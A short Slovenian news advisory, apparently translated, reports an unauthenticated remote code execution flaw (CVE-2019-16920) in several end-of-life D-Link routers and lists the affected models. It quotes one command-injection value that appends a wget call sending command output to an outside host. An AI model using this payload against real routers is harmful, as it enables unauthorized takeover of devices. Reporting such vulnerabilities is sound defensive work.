Ranljivost, ki jo je mogoče na daljavo izkoristiti v usmerjevalnikih D-Link

V brezžičnih usmerjevalnikih D-Link ugotovljeno nevarna ranljivost (CVE-2019–16920), ki vam omogoča oddaljeno izvajanje kode na strani naprave s pošiljanjem posebne zahteve upravljalniku »ping_test«, ki je dostopen brez avtentikacije.

Zanimivo je, da naj bi se po mnenju razvijalcev strojne programske opreme klic »ping_test« izvedel šele po preverjanju pristnosti, v resnici pa se kliče v vsakem primeru, ne glede na prijavo v spletni vmesnik. Zlasti pri dostopu do skripta apply_sec.cgi in posredovanju parametra »action=ping_test« skript preusmeri na stran za preverjanje pristnosti, vendar hkrati izvede dejanje, povezano s ping_testom. Za izvedbo kode je bila v samem ping_test uporabljena druga ranljivost, ki pokliče pripomoček ping, ne da bi pravilno preverila pravilnost naslova IP, poslanega v testiranje. Na primer, če želite poklicati pripomoček wget in prenesti rezultate ukaza »echo 1234« na zunanjega gostitelja, samo podajte parameter »ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".

Ranljivost, ki jo je mogoče na daljavo izkoristiti v usmerjevalnikih D-Link

Prisotnost ranljivosti je bila uradno potrjena v naslednjih modelih:

  • DIR-655 z vdelano programsko opremo 3.02b05 ali starejšo;
  • DIR-866L z vdelano programsko opremo 1.03b04 ali starejšo;
  • DIR-1565 z vdelano programsko opremo 1.01 ali starejšo;
  • DIR-652 (ni podatkov o problematičnih različicah vdelane programske opreme)

Obdobje podpore za te modele je že poteklo, zato D-Link Dejal je,, ki jim ne bo izdal posodobitev za odpravo ranljivosti, odsvetuje njihovo uporabo in svetuje zamenjavo z novimi napravami. Kot varnostno rešitev lahko omejite dostop do spletnega vmesnika samo na zaupanja vredne naslove IP.

Kasneje je bilo ugotovljeno, da je bila ranljivost tudi vpliva modeli DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 in DIR-825, za katere načrti za izdajo posodobitev še niso znani.

Vir: opennet.ru

Dodaj komentar